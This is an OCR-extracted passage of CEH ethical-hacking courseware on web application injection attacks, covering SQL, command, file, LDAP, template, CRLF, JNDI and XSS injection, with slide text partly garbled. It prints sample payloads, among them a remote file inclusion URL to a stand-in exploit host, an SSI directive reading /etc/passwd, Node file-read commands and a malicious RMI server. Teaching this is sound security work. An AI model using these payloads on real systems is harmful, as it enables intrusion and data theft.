denial of access. Such flaws are prevalent in legacy code and often found in SQL, LDAP, and
XPath queries. They can be easily discovered by application vulnerability scanners and fuzzers.
Attackers inject malicious code, commands, or scripts in the input gates of flawed web
applications such that the applications interpret and run the newly supplied malicious input,
which in turn allows them to extract sensitive information. By exploiting injection flaws in web
applications, attackers can easily read, write, delete, and update any data (i.e., relevant or
irrelevant to that particular application) . There are many types of injection flaws, some of which
are discussed below:
■ SQL Injection: SQL injection is the most common website vulnerability on the Internet,
and it is used to take advantage of non-validated input vulnerabilities to pass SQL
commands through a web application for execution by a backend database. In this
technique, the attacker injects malicious SQL queries into the user input form either to
gain unauthorized access to a database or to retrieve information directly from the
database.
■ Command Injection: Attackers identify an input validation flaw in an application and
exploit the vulnerability by injecting a malicious command in the application to execute
supplied arbitrary commands on the host operating system. Thus, such flaws are
extremely dangerous.
■ LDAP Injection: LDAP injection is an attack method in which websites that construct
LDAP statements from user-supplied input are exploited for launching attacks. When an

Module 14 Page 1902 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

application fails to sanitize the user input, the attacker modifies the LDAP statement
with the help of a local proxy. This, in turn, results in the execution of arbitrary
commands such as granting access to unauthorized queries and altering the content
inside the LDAP tree.
■ Cross-Site Scripting {XSS)
XSS flaws occur when an application includes untrusted data in a new web page without
proper validation or escaping, or when an application updates an existing web page with
user-supplied data using a browser API that can create JavaScript. XSS allows attackers
to inject and execute scripts in the victim's browser, which can hijack user sessions,
deface websites, or redirect the user to malicious sites.

Module 14 Page 1903 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

SQL Injection Attacks

- -
SQL injecti on attacks use a series of malicious SQL queries to direct ly manipulate t he database

An attacker can use a vulnerable web appl icat ion to bypass normal security measures and obtain direct access t o va luable data

SQL injection attacks ca n often be executed from the address bar, from within application fields, and through queries and searches

&1 OE •·-·-~---7
Attacker
When th1scode 1s sent to the database
se rver, it drops t~e Messages table
01
02

03

OS
<?p hp
f;:~;!~~) s ave_emai l ( $ u ser ,
(

us er , message
) VALUES (
;······:> 06
1···············& ···················3
v ' • :0:9 '$messa~::$user ' '
r eturn my s ql_ que r y($sq l);
..... .
Br::!er •···············•··········► Internet 10
11
I
?>
SQL Injection v ulnerable server code

Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 15: SQL Inj ection

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

SQL Injection Attacks

SQL injection attacks use a series of malicious SQL queries or SQL statements to directly
manipulate the database. Applications often use SQL statements to authenticate users, validate
roles and access levels, store and retrieve information for the appl ication and user, and link to
other data sources. SQL injection attacks work because the application does not properly
validate the input before passing it to an SQL statement. For example, consider the following
SQL statement:
SELECT* FROM tablename WHERE UserID= 2302

becomes the following with a simple SQL injection attack:

SELECT* FROM tablename WHERE UserID= 2302 OR 1=1

The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all
user ID values from the database. An attacker uses a vulnerable web application to bypass
normal security measures and obtain direct access to valuable data. Attackers carry out SQL
injection attacks from the web browser's address bar, form fields, queries, searches, and so on.
SQL injection attacks allow attackers to
• Log into the application without supplying valid credentials
■ Perform queries against data in the database, often even data to which the application
would not normally have access
■ Modify database contents or drop the database altogether
■ Use the trust relationships established between the web application components to
access other databases

Module 14 Page 1904 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

A~-
Attacker
-
•··O ···I <•H") ,DR<" TABLE Message" --

When t his code is sent to t he database

server, it drops th.e Messages table
I
01

02
03

o4
05
<?php
function save email($user ,
$message) -

$sql = "INSERT INTO

Messages (
user , message
06 VALUES
:"""~
i··············G ···················i 07 '$user',
' $message'

Ohl I I
8 08
09
) II ;

return mysql_query($sql);
10
11 ?>

SQL Injection vulnerable server code

Figure 14.8: SQL Inject ion attack

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15:
SQL Injection.

Module 14 Page 190S Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Command Injection Attacks

J An attacker t ries to craft an input string to gain shell access to a web server
Shell
Shell injection functi ons include system(), StartProcess(), java.lang.Runtime.exec(), {}
Injection
System .Diagnostics.Process.Start(), and similar API comma nds

This t ype of at t ack is used to deface websites virtually. Using this at tack, an attacker
HTML adds extra HTML-based co ntent t o t he vulnerabl e web application
Embedding In HTM L embedding attacks, a user adds input t o a w eb script that is t hen used in t he
<I>
out put HTM L w ithout being checked fo r HTML code or scripting

Attackers exploit this vu lnerability to inject malicious code into system files
File
Injection http ://www . certifiedhacker . com/ vulnerable . php?COLOR=http://evil
/exploit ?

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

Command Injection Attacks

Command injection flaws allow attackers to pass malicious code to different systems via web
applications. The attacks include calls to an operating system over system calls, use of external
programs over shell commands, and calls to backend databases over SQL. Scripts in Perl,
Python, and other languages execute and insert poorly designed web applications. If a web
application uses any type of interpreter, attackers insert malicious code to inflict damage.
To perform various functions, web applications must use operating system features and
external programs. Although many programs invoke externally, a frequently used program is
the sendmail program. Carefully scrub an application before passing a piece of information
through an HTTP external request. Otherwise, attackers can insert special characters, malicious
commands, and command modifiers into the information. The web application then blindly
passes these characters to the external system for execution. Inserting SQL commands is a
dangerous practice and rather widespread, as it is a command injection method. Command
injection attacks are easy to carry out and discover, but they are difficult to understand.
The following are some types of command injection attacks :
• Shell Injection

o An attacker tries to craft an input string to gain shell access to a web server
o Shell injection functions include system () , StartProcess () ,
java.lang.Runtime . exec() ,
System . Diagnostics . Process . Start () , and similar APls

Module 14 Page 1906 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ HTML Embedding

o This type of attack is used to deface websites virtually. Using this attack, an attacker
adds extra HTML-based content to the vulnerable web application
o In an HTML embedding attack, the user input to a web script is placed into the
output HTML without being checked for HTML code or scripting
■ File Injection

o The attacker exploits this vulnerability and injects malicious code into system files
http://www . certifiedhacker.com/vulnerable.php?COLOR=http:
//evil/exploit?

Module 14 Page 1907 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Command Injection Example

Malicious code:

WWW certifiedhacker com/banner gif I I newpasswordl 110361601468 - •

Username [ Addison

;::::====
Hacker.com
~@~

D An attacker enters malicious code (e.g., an account number)

w it h a new password
Email Address ( addi@certifiedhacker. com

Site U RL [ www.certifiedhacker.com

Banner URL [ .gif 11newpasswordl 1036 1601468

6 The last two sets of numbers are the banner size Password ( newpassword ) ~

I] Once the attacke r cl icks t he submit button, the password for

the account 1036 is changed to "newpassword"

~
Poor i nput validation at server script was
ex pl oited i n t his attack that uses database

B The server script assumes that only the URL of t he banner

i mage file is inserted into t hat f ield
INSERT an d UPDATE record command
Server

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Command Injection Example

An attacker enters the following malicious code (account number) with a new password.
www.certifiedhacker.com/banner.gifl lnewpasswordl 110361601468
The last two sets of numbers denote the banner size. Once the attacker clicks the submit
button, the password for the account 1036 is changed to "newpassword." The server script
assumes that only the URL of the banner image file is inserted into that field.

Attacker Launching A
Code Injection Attack ~
· ···································:>
""'
www.cert1f1edhacker.com/banner.g1f
I lnewpasswordl 110361601468

Malicious code Email A ddress [ [email protected]

Site URL ( www.certifiedhacker.com )

Banner URL [ sif I lnewpasswordl1036 l 60l468 )

Password [ new password

Poor input va lidati on at server script w as ~=

-•
explo ited in t his attack t hat uses database
INSERT and UPDATE reco rd com m an d
Server

Fig ure 14.9: Co m m and Injection attack exam ple

Module 14 Page 1908 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

File Injection Attack

<?ph p
0 $drink = ' coke ' ;
i f ( is set ( $ GET [ ' DRINK I] ) )
<form metho d= " q e t "> $drink = $ GE T ( ' DRINK ' ] ;
< s e lect name"""DRINK" > r e q uir e ( $dri;;k . ' . php ' } ;
<option v a lua= " paps i ">peps i</option> ?>
<op tion valua:-"coke ">coka </option >
</sel ect>
<input typa:- "s ubmit">
</form>

Server File System

Client code running in a browser Vulnerable PHP code

http : //www _certifi edhacker _com/orders - PhP?DRINK=http: //jasoneval -COm/exploi t? ~ --- ----··-- Exploit Code

Attacker inject s a remot ely hosted File inject ion att acks enable attackers t o exploit vulnerable
file at www.jasoneval.com scripts on t he server to use a rem ote fil e instead of a
containing an exploit presumably trust ed file from the local file system
Attacker

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

File Injection Attack

A file injection attack is a technique used to exploit "dynamic file include" mechanisms in web
applications. File injection attacks enable attackers to exploit vulnerable scripts on the server to
use a remote file instead of a presumably trusted file from the local file system. It occurs when
a user is allowed to supply input for the include command dynamically, which is not properly
validated before processing. When a user provides input, the web application passes it into "file
include" commands. Most web application frameworks support file inclusion. Hence, an
attacker enters a URL that redirects the application to the location of the malicious file. While
referring to the file without proper validation, the application executes the file script by calling
specific procedures. Web applications are vulnerable to file injection attacks if the referred files
are relayed using elements from HTTP requests. PHP is particularly vulnerable to these attacks
because of the extensive use of "file includes" in PHP programming and default server
configurations.
If the application ends with a php extension, and if a user requests it, then the application
interprets it as php script and executes it. This allows an attacker to perform arbitrary
commands. Consider the following client code running in a browser:
<form method="get">
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">

Module 14 Page 1909 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

</form>
Vulnerable PHP code:
<?php
$drink= 'coke';
if (isset( $_GET['DRINK'] ) )
$drink= $_GET['DRINK'];
require( $drink . ' . php' );
?>
To exploit the vulnerable php code, the attacker injects a remotely hosted file at
www.jasoneval.com, which contains an exploit.
Exploit code:
http://www.certified hacker .com/orders. ph p?DRINK=http://jasoneval.com/exploit?

Module 14 Page 1910 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

LDAP Injection Attacks

LDAP Directory Services store and organize information based on its attributes. The information is hierarchically
organized as a tree of directory entries

LDAP is based on the cl ient -server model, and clients can search through directory entries using filters

LDAP injection at tacks are similar to SQL injection attacks, but exploit user parameters to generate an LDAP query

LDAP injection techniques take advantage of non-validated web application input vul nerabilities and pass LDAP filters
used for searching Directory Services to obtain direct access to databases behind an LDAP tree

To test if an application is vulnerab le to LDAP code injection, send a query to the server that generates an invalid input.
If the LDAP server returns an error, it can be exploited with code injection techniques

.............................................................................
....................................................
• : If an attacker enters the va lid username "certifiedhacker" ,
: Account Login i and injects certifiedhacker)(&)), then the URL string
• ,----, ; [ ] ; becomes (&(USER=certifiedhacker)(&))(PASS=blah)).
~t 1•■ - " 1.......... ",-. :!..
Q Username - certifiedhacker)(&)) . ; :
!, ............ .. ~ :, Then, only the first filter is processed by the LDAP server,
■ ■ ,------..... so it only processes (&(USER=certifiedhacker){&)). This
- ! Passwo rd [ blah ] ! j query is always true, and therefore the attackercanlog
Attacker : .......... ............................. .~'!~.'!!' !.. j : into the syst em without a valid password.
, .............................................................................

Copynght Cl by EC-Cllmcll All Rights Reserved Reproduction 1s Stnctly Prohibited

LDAP Injection Attacks

LDAP Directory Services store and organize information based on its attributes. The information
is hierarchically organized as a tree of directory entries. The Lightweight Directory Access
Protocol (LDAP) is based on the client-server model, and clients can search the directory entries
using filters.

Filter
(attributeName operator value)
Syntax

Operator Example

=
>=
<=
~-
*
AND(&)

OR (I) (I (objectc1ass=user) (di sp1a yName=John)

NOT(!) (!objectc1ass=group)

Figure 14.10: LDAP tree

Module 14 Page 1911 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

An LDAP injection attack works in the same way as an SQL injection attack, but it exploits user
parameters to generate an LDAP query. It runs on an Internet transport protocol such as TCP,
and it is an open-standard protocol for manipulating and querying Directory Services. An LDAP
injection technique is used to take advantage of non-validated web application input
vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access
to databases behind an LDAP tree.
LDAP attacks exploit web-based applications constructed based on LDAP statements using a
local proxy. Web applications may use user-supplied input to create custom LDAP statements
for dynamic web page requests. Attackers commonly perform LDAP injection attacks on web
applications employing user inputs to generate LDAP queries. The attackers can use the search
filter attributes to discover the underlying LDAP query structure. Using this structure, the
attacker includes additional attributes in the user-supplied input to determine whether the
application is vulnerable to LDAP injection and evaluates the web application's output.
Depending on the implementation of the target, attackers use LDAP injection to achieve:
• Login bypass
■ Information disclosure
• Privilege escalation
• Information alteration
Example:

To test if an application is vulnerable to LDAP code injection, send a query to the server that
generates an invalid input. If the LDAP server returns an error, it can be exploited with code
injection techniqu es.
...............................................
Account Login
,m-m• : Username certifiedhacker)(&))
password lit • • • • • • • • • ~ :

: Password blah
Attacker
----==--- Submit

Figure 14. 11: LDAP Injection attack example

If an attacker enters a valid username "certifiedhacker" and injects certifiedhacker)(&)), then

the URL string becomes (&(USER=certifiedhacker)(&))(PASS=blah)). The LDAP server processes
only the first filter; only the query (&(USER=certifiedhacker)(&)) is processed. This query is
always true, and the attacker logs into the system without a valid password .
An important defense method against such attacks is to filter all inputs to the LDAP; otherwise,
vulnerabilities in LDAP allow the execution of unauthorized queries or modification of its
contents. When the attacker modifies the LDAP statements, the process runs with th e same
permissions as the component of the web application that executed the command.

Module 14 Page 1912 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Other Injection Attacks

e Vulnerabilities for server-side JavaScript injections emerge when an applicati on integrates user-controllable
Server-Side JS values into a string that is dynamically validated by a code interpreter
Injection e Attackers exploit these vulnerabilitie s to compromi se the fu nctionality and data of applicati ons hosted by t he
server

e Server-side Includes is an application feature t hat helps designers to auto-generat e the content of t he web
Server-Side page w ithout manual involvement
Includes Injection
e Attackers exploit this feature to pass malicious SSI directives as input values and perform malicious acti vit ies

8 Server-side t emplate injecti on occurs when use rs are allowed to insert un safe inputs into a server -side
Server-Side templat e
Template Injection 8 Attackers can inj ect malicious template directives to run arbit rary code and gain complete control over t he
target web server

8 Attackers launch log injection attacks by exploiting the acceptance of unsaniti zed or non-validated input
Log Injection
into application logs

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Other Injection Attacks (Cont'd)

8 Atta c kers ex ploit v ulnera ble form inputs to inject HTML code into a w eb page and ch ange the
HTML Injection
appearance of the website or the information provided to its users

8 Attackers inject carriage return (\r) and linefeed (\n) characters into user input to trick a web
CRLF Injection server, web application, or user into terminating the input of a current object and initiate a
new obje ct

8 The Jav a Naming and Direct o ry Interface (JNDI) is a Java-based API that t a kes a single
para m eter a s input and sea rches fo r the request ed object based on the specified name
JNDI Injection 8 Attackers exploit thi s vulnerability by resolving the " classFactory" and
"classFactoryLocation" attribute request s made using
" Ini t i a1Context () . lookup (name) " with a m a licious class

Copynght Cl by EC·CIUIICII All Rights Reserved Reproducuon is Strictly Proh1b1ted

Other Injection Attacks

Some other types of injection attacks are discussed below:
■ Server-Side JS Injection
Server-side JavaScript injections are vulnerabilities that manifest when an application
integrates user-controllable values into a string that the code interpreter dynamically
validates. Attackers exploit improper validation of user data and pass random values to

Module 14 Page 1913 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

alter the code that will be compiled and executed by the server. These vulnerabilities
also allow attackers to compromise the functionality and data of the applications hosted
by the server. Attackers can also use the server as a source to launch further attackers in
the target network.
Example of server-side JavaScript injection:
Attackers can launch a Dos attack by passing commands to the eval() function :
While (1)
This command forces the server's event loop to use the complete processer time and
restricts it from evaluating additional inputs until the process is reinitiated .
Attackers can also read the files' content from the server. The following commands can
display the content of the current and parent directories:
res.end(require('fs') .readdirSync('.') .toString())
res.end(require('fs') .readdirSync(' . . ') .toString())
After retrieving the file names, attackers can pass the following commands to read the
content inside the file:
res.end(require('fs') .readFileSync(filename))
This vulnerability can be exploited further by initiating and running malicious binary files
using the modules fs and child_process
• Server-Side Includes Injection
Server-side Includes is an application feature that helps designers to auto-generate the
content of the web page without manual involvement. The# directives allow developers
to perform this activity. These directives can be files, CGI variables, shell commands, etc.
After evaluating all the directives, HTML is delivered to the requester.
Typical directives include:
<! #include virtual= "/footer.html"-->
<! #echo var= "DATE LOCAL"-->
Attackers launch server-side injection attacks to take control over web applications
integrated with SSI directives. Such an application accepts remote user inputs and uses
them on the page. Attackers exploit this feature and pass malicious 551 directives as
input values to perform malicious activities such as modifying and erasing server files,
running shell commands, and taking control over critical files such as "/ etc/passwd".
For example, attackers may use the following malicious directive that results in the
retrieval of data from /etc/passwd files, as there is no evaluation of the user inputs:
<! #exec cmd="cat/etc/passwd" -->
• Server-Side Template Injection
While creating dynamic pages, designers or developers use template engines to
segregate programming logic from data presentation. Thus, instead of storing code that

Module 14 Page 1914 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

accepts requests and extracts the required information from the database and passing it
to users in monolithic data file, template engines are employed to segregate the
presentation of the data from the remaining code that evaluates it.
Server-side template injection occurs when users are allowed to insert unsafe inputs
into a server-side template. When this vulnerability exists, attackers can inject malicious
template directives to run arbitrary code and gain complete control over the target web
server. This injection is similar to XSS but is often employed to target server internals
and achieve remote code execution, making every vulnerable application a primary
target. Template injection manifests via designers' code errors and deliberate template
disclosure while showcasing rich features of applications, biogs, etc.
For example, consider the following complex PHP and HTML code:
<html>
<head>
<title>{{title}}</title>
</head>
<body>
<form method= "{{method}}" action= "{{action}}">
<input type= "text" name= "user" value= "{{username}}">
<input type= "password" name= "pwd" value="">
<button type= "submit">Submit</button>
</form>
<p> This page took { {microtime (true) - time}} seconds to
render. </p>
</body>
</html>
Replace the abovementioned code using template engines as follows:
$templateEngine = new TemplateEngine();
$template= $templateEngine -> loadFile ('SignUp.tpl');
$template-> assign('title', 'login');
$template-> assign('method', 'post');
$template-> assign('action' 'SingUp.php');
$template-> assign('username', getUsernameFromCookie());
$template-> assign('time', microtime(true));
$template-> show();
The abovementioned code is vulnerable to template injection as it can execute native
functions. If attackers are able to attach template files with such expressions, they can
run any arbitrary function to gain access to the target web server.

Module 14 Page 1915 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Log Injection

Attackers launch log injection attacks by exploiting unsanitized or unvalidated inputs to

application logs. Applications usually store a large number of logs such as access logs,
transaction logs, monitor logs, exception or error logs, GC logs, and crash logs. If an
application or its administrator fails to log users' events or actions in a secure manner,
attackers could insert fake entries or records to corrupt the log file. Attackers use this
technique to insert misleading information in the log file for covering their tracks in the
event of a successful attack.
For instance, consider an application that logs data in the following format:
Date, Time, Username, ID, source IP, Request
The unvalidated input parameters come directly from the request
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username:
xyz; id=Walkin
Attackers can manipulate the id parameter to save the log with fake inputs:
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username:
xyz; id=\r\n (Fake input)
If the log fails to escape null bytes, the remainder of the string is not recorded.
For example,
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username:
xyz; id=%00
The individual log entry can be prevented at the id field
Date, Time, Username, . ...
■ HTML Injection

An HTML injection attack is initiated by injecting HTML code via vulnerable form inputs
of a web page to change the appearance of the website or the information provided to
its users. It is different from JavaScript and VB script injection attacks. HTML is a core
language employed to design a website, and it is often targeted by attackers to change
its functional ity and original look. If an attacker can successfully inject HTML code,
legitimate users may be diverted from their intended activity.
For instance, when the HTML code is inject ed, it allows the attacker to create a
malicious form that appears to be genuine to the end users. It requests users to re-enter
their credentials. Once the form is submitted with their credentials, it exfiltrates the
information to the attacker.
Example: General application template for search results page:
<html>
<hl> Results matching the given query: </hl>
<h2> {user_query} </h2>

Module 14 Page 1916 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

<ol> <li> Result A

<li> Result B </ol>
</html>
User query:
</h2>special offer <a
href=www.certifiedhacker.com>malicious link </a><h2>
Resulting page following HTML injection:
<html>
<hl> Results matching the given query: </hl>
<h2></h2> special offer <a
href=www.certifiedhacker.com>malicious link</a><h2></h2>
<ol> <li> Result A
<li> Result B </ol>
</html>
However, the attacker aims to include HTML code in a page that other users visit. For
this purpose, code injection should be included in the page content that is intended to
be viewed by end users. The injection occurs if applications save untrusted user inputs
and disclose data to other users. For instance, assume that the abovementioned
application consists of a page showing the users' search history:
Code snippet (application template) for search history page
<html>
<hl> Recent search history: </hl>
<ol> <li><h2> {user_query_l} </h2>
<li><h2> {user_query_2} </h2> </ol>
</html>
Resulting search history page following HTML injection
<html>
<hl> Recent search history: </hl>
<ol>
<li><h2> Top 10 thriller movies </h2>
<li><h2></h2> special offer <a
href=www.certifiedhacker.com> malicious link</a><h2></h2>
</ol> </html>
Now, every search result link that a user tries to access will display a malicious link
generated by the attacker. If any user is attracted to the link and opens it, he/she will be
viewing the content generated from attacker's domain, and any credentials entered on
that page are exfiltrated to the attacker.

Module 14 Page 1917 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ CRLF Injection

In a carriage return line feed (CRLF) injection attack, attackers inject carriage return (\r)
and line feed (\n) characters into the user's input to trick the web server, web
application, or user into believing that the current object is terminated and a new object
has been initiated. CRLF injection is a vulnerability that manifests when a user enters the
CRLF characters into an application. These characters signify the end of the line for
different Internet protocols, which, when combined with HTTP request/response
headers, can lead to various vulnerabilities such as HTTP request smuggling and
response splitting.
HTTP request smuggling can occur when an HTTP request is transmitted via a server,
which serves as a proxy to validate and forward the request to the next server. Such
vulnerabilities can also lead to further attacks such as cache poisoning, firewall security
breach, and request hijacking.
In HTTP response splitting, attackers can include arbitrary HTTP headers for the HTTP
response to split the response and body. It results in delivering two responses instead of
one, which can lead to further vulnerabilities such as cross-site scripting.
Consider the following example of CRLF injection in log files:
Suppose that the admin panel has a log file with the IP time and URL path of the visited
site as follows:
10.10.10.10 - 09 : 25 - /index . php?page=about
If an attacker can embed CRLF characters into the HTTP request, then he/she can
change the output flow and can enter fake log entries. Furthermore, the attacker can
alter the web application response as follows:
/index.php?page=about&%0d%0a127.0.0.1 09:25 -
/index.php?page=about&restrictedaction=edit
Here, %0d and %0a are CR and LF encoded characters. After injecting CRLF characters,
the log entries appear as follows:
10.10.10.10 - 09 : 25 - /index.php?page=about&
127.0.0 . 1 09:25
/index.php?page=home&restrictedaction=edit
Attackers exploit CRLF injection vulnerabilities to manipulate log entries to hide their
malicious activities.
■ JNDI Injection

The Java Naming and Directory Interface (JNDI) is a Java-based API that takes a single
parameter as input and searches for the requested object based on the specified name.
It searches for objects in directory services such as Common Object Request Broker
Architecture (CORBA), LDAP, DNS, or Remote Method Invocation (RMI) . If the parameter
resides in malicious services managed by attackers, th en th e appl ication fetches a

Module 14 Page 1918 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

malicious class object from the server, which leads to remote code execution and
eventually the compromise of the application .
Attackers exploit this vulnerability in the target Java application by resolving the
"classFactory" and "classFactoryLocation" attribute requests made using
"Ini tialContext () . lookup (name)" with a malicious class. If the requested
object name is responded to with a malicious object class having the same name that is
stored in the attackers' servers, the Java application fetches that code and executes it,
which leads to remote code execution. If the "classFactory" object name is not
found in the server, then the Java application fetches the code by resolving
"classFactoryLocation," which is a URL.
The following is sample code in a vulnerable application that allows JNDI injection:
@RequestMapping ("/lookup")
@Example(uri = {"/lookup?name=java:comp/env"})
public Object lookup(@RequestParam String name) throws
Exception{
return new javax.naming . InitialContext() .lookup(name);
}

The following sample code fetches bytecode from a malicious URL:

public class MaliciousRMIServer {
public static void main(String[] args) throws Exception
{

System.out.println("Creating malicious RMI registry on

port 1097");
Registry myregistry =
LocateRegistry.createRegistry(1097);
Reference ref£= new
javax.naming.Reference("ExportObject","ExportObject","
http://www.certifiedhacker.com/") ;
ReferenceWrapper referenceWrap = new
com.sun.jndi.rmi.registry.ReferenceWrapper(reff);
myregistry.bind("Object", referenceWrap) ;
}

Module 14 Page 1919 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Cross-Site Scripting (XSS) Attacks

Cross-site scripting ('XSS' or 'CSS') attacks
exploit vulnerabilities in dynamically
generated web pages, enabl ing mal icious
attackers to inject cl ient-si de scripts into
How XSS Attacks Work
Normal Request This example uses a vulne rable
page, which handles re quests
http : //oartifiedhacker . com for nonexistent pages: a classic

web pages viewed by other users ..0 ..'..~'.':".~~-./~:~:.~.~ ··············;- - -•-••-•-"o_,_•ag-•__

404 Not found
It occu rs when unvalidated input data is
included in dynamic content that is sent /jason_fila . html
v (Handles requests
to a user's we b browser for rendering fo r a nonexistent
page: a classic 404
error page)
Att ackers i nj ect malicious JavaScript,
VBScript, ActiveX, HTML, or Flash for print "Not found :
execution on a victim's system by hiding xss Attack Code urldeooda ($ SERVER [ "
~ S T_ URI-;;) ) ;
it within legitimate requests ?>
</body>
Some XSS attack exploits i nclude --~~~~~~-~~~~~- G· </htm1>
' - - - - - ,~
-- - - - '
Server
malicious scri pt execut ion, redirecti ng
to a malicious server, exploit ing user
privileges, ads in hidden IFRAMES and ·O···· ..······· ..···· ...................i
http : / /oartifiadhacker.com/<script>
pop-ups, data manipulation, etc. alart ("WARNill'G: Tha awlication h as
e ncounter ed a n err or") ;</ scri pt>

Note: Check t he CEH Tools, Module 14: Hacking We b Applications, for t he XSS cheat sheet

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Cross-Site Scripting (XSS) Attacks

Cross-site scripting (XSS or CSS) attacks exploit vulnerabilities in dynamically generated web
pages, which enables malicious attackers to inject client-side script into web pages viewed by
other users. Such attacks occur when inval idated input data is included in dynamic content that
is sent to a user's web browser for rendering. Attackers inject malicious JavaScript, VBScript,
ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate
requests. Attackers bypass client-ID security mechanisms, gain access privileges, and then inject
malicious scripts into specific web pages. These malicious scripts can even rewrite HTML
website content.
Some exploitations that can be performed by XSS attacks are as follows:
■ Malicious script execution ■ Session hijacking
■ Redirecting to a malicious server ■ Brute-force password cracking
■ Exploiting user privileges ■ Data theft
■ Ads in hidden IFRAMES and pop-ups ■ Intranet probing
■ Data manipulation ■ Keylogging and remote monitoring
How XSS Attacks Work

A web page consists of text and HTML markup created by the server and obtained by the client
browser. Servers can control the client's interpretation about the st atically generated pages,
but they cannot completely control th e client' s interpretation of the output of th e page
generated dynamica lly by the servers. Thus, if the attacker insert s untrusted content into a
dynamic page, neither the server nor the client recognizes it. Untrusted input can come from
URL parameters, form elements, cookies, dat abase queries, and so on.

Module 14 Page 1920 Ethical Hacking and Countermeasures Copyright © by EC-Council

A ll Right s Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

If the dynamic data inserted by the web server contains special characters, the user's web
browser will mistake them for HTML markup, as it treats some characters as special to
distinguish text from markup. Thus, an attacker can choose the data inserted into the
generated page and mislead the user's browser into running the attacker's script. As the
malicious scripts will execute in the browser's security context for communicating with the
legitimate web server, the attacker will have complete access to the document retrieved and
may send the data in the page back to his/her site.

Normal Request This example uses a vulnerable

page, which handles requests
http://certifiedhacker . com for nonexistent pages : a classic

.. O ···~~~.~~~;-;:~;.~:~.~~·············: - - - -4-04_ e_ r_ro_r_p_ag_e_ _~

404 Not fou nd

/jason_file.html (Handles requests

Server Code for a nonexistent
page: a classic 404
<html >
error page)
<body>
<? php
print "Not found: "
XSS Attack Code urldecode ($_ SERVER["
REQUEST_ URI"]);
?>
</body>
</html > Server

~
A WARtffiG:The~hon
